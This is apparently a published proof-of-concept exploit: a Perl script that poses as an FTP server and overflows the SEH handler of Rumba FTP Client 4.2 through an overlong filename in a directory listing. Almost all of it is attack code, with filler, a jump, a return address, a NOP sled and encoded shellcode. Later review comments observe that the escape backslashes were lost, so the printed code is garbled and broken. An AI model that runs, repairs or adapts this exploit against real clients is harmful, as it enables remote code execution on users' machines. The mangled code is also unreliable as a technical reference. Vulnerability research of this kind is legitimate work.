
# Title : Rumba ftp Client 4.2 PASV BoF (SEH)
# Published : 2010-04-25
# Author : zombiefx


# Email: darkernet[at]gmail.com
# Tested on: Windows XP SP3
# SEH overwrite occurs when the server sends the directory listing to the client with an
# overly long filename extension. *Note: version 4.2.3 might also suffer from this.
# Usage: ./rumbaftp_exploit
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;
# Control-channel listener: a minimal fake FTP server on TCP/21 (backlog 1).
# Binding port 21 needs privileges on most systems; failure is fatal here.
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto => 'tcp', Listen => '1' )
  or die "Socket Not Created $!n";
# NOTE(review): throughout this listing the string literals show "n" and "rn"
# where "\n" / "\r\n" would be expected; the backslashes appear to have been
# lost in extraction, so the code is not runnable exactly as printed.
print 
      "#############################################################n"
    . "#              Rumba ftp Client 4.2 PASV BoF (SEH)          #n"
    . "#                By: zombiefx                               #n"
    . "#         Listening on port 21 with pasv port of 31337      #n"
    . "#############################################################n";
# Address advertised in the PASV reply, in the comma-separated form the
# 227 response uses (see the /PASV/ branch below).
my $pasvip = "127,0,0,1";
# One client at a time: greet it, then answer each command line it sends.
while ( my $data = $sock->accept() ) {
    print "Client Connected!nAwaiting Ftp commands: n";
    print $data "220 Gangsta Rap Made Me Do Itrn";
    # Each command is matched case-insensitively and unanchored against $_,
    # so e.g. a line containing "pass" anywhere gets the 230 reply.
    while (<$data>) {
        print;    # echo the client's command to the local console
        print $data "331 Anonymous access allowedrn"                        if (/USER/i);
        print $data "230-Welcome to N0 M4Ns l4nd.rn230 User logged in.rn" if (/PASS/i);
        print $data "215 UNIX Type: L8 rn"                                  if (/SYST/i);
        # NOTE(review): as printed, the inner quotes around / are unescaped,
        # which would not parse; presumably \" in the original.
        print $data "257 "/" is current directory.rn"                     if (/PWD/i);
        print $data "200 Type set to I.rn"                                  if (/TYPE I/i);
        print $data "200 Type set to A.rn"                                  if (/TYPE A/i);
        print $data "214 Syntax: SITE - (site-specific commands)rn"         if (/HELP/i);
        # Data port = 122*256 + 105 = 31337, matching the banner and the
        # arguments passed to senddata() below.
        print $data "227 Entering Passive Mode ($pasvip,122,105)rn"         if (/PASV/i);

        # LIST is the trigger: the 150/226 replies go on the control channel
        # and the oversized listing entry is delivered on the data channel.
        # From a defender's view, a directory listing whose filename runs to
        # well over a kilobyte is the observable sign of this server.
        if (/LIST/i) {
            print $data "150 Here comes the directory listing.rn" . "226 Directory send OK.rn";
            # Style: the &name(...) call form is discouraged; senddata('122','105')
            # would be the conventional call.
            &senddata( '122', '105' );
        }

    }
    # Reached once the client closes the control connection.
    print "Payload delivered check the client!n";
}

# senddata(P1, P2): serve the PASV data connection on port P1*256+P2 and
# write a single directory-listing line whose filename extension is the
# overflow string. Called once per LIST command; returns nothing useful.
sub senddata {
    # Decode the two PASV port octets (high byte, low byte) into the data port.
    my $port     = $_[0] * 256  + $_[1];
    # No "or die" here: if the bind fails $pasvsock is undef and the accept()
    # on the next line dies with a method-on-undefined-value error instead.
    my $pasvsock = IO::Socket::INET->new( LocalPort => $port, Proto => 'tcp', Listen => '1' );
    # Blocks until the client opens its data connection.
    my $pasvdata = $pasvsock->accept();
    # Filler preceding the SEH record. NOTE(review): as printed this repeats
    # the three-character string "x77"; presumably "\x77" before extraction.
    # The same lost-backslash pattern affects $nseh, $nops and $calcshell.
    my $junk    = "x77" x 1351;
    # 32-bit little-endian address used to overwrite the handler pointer;
    # the author notes it is located in ftplogic.dll.
    my $seh  = pack( 'V', 0x1006E534 );# located in ftplogic.dll
    # Four bytes landing on the next-SEH field (per the variable name).
    my $nseh = "xebx06x90x90";
    my $nops = "x90" x 50;
    # Shellcode blob; the name suggests it launches calc.exe (not verified here).
    my $calcshell =
        "x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
      . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
      . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
      . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
      . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
      . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
      . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
      . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
      . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
      . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
      . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
      . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
      . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
      . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
      . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
      . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
      . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
      . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
      . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
      . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
      . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
      . "x31x42x4cx42x43x45x50x41x41";

    # Layout on the wire: filler, next-SEH field, handler address, NOP sled,
    # shellcode -- all of it becomes the "extension" of the filename below.
    my $payload = $junk . $nseh . $seh . $nops . $calcshell;

    # One UNIX-style listing line; the client parses the filename and that is
    # where the overflow happens. Neither socket is closed explicitly -- the
    # lexical handles are released when the sub returns.
    print $pasvdata
      "-rw-rw-r--    1 1176     1176         1060 Apr 23 23:17  test.$payloadrnrn";
}